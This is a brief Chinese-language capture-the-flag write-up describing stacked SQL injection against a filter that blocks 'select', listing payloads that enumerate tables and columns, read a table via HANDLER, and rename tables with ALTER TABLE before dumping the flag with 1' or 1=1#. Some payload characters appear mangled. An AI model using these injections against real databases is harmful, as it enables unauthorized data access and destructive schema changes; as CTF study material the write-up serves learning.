由于select被过滤,堆叠注入
inject=-1%27;show%20tables%20–+
inject=-1’;show columns from
1919810931114514
--+
方法一
使用handler查询,payload如下:
-1’;handler1919810931114514
open;handler1919810931114514
read first;#
方法二
1’; alter table words rename to words1;alter table1919810931114514
rename to words;alter table words change flag id varchar(50);#
拆分开来如下:
1’;
alter table words rename to words1;
alter table1919810931114514
rename to words;
alter table words change flag id varchar(50);
4.然后使用1’ or 1=1#即可查询出flag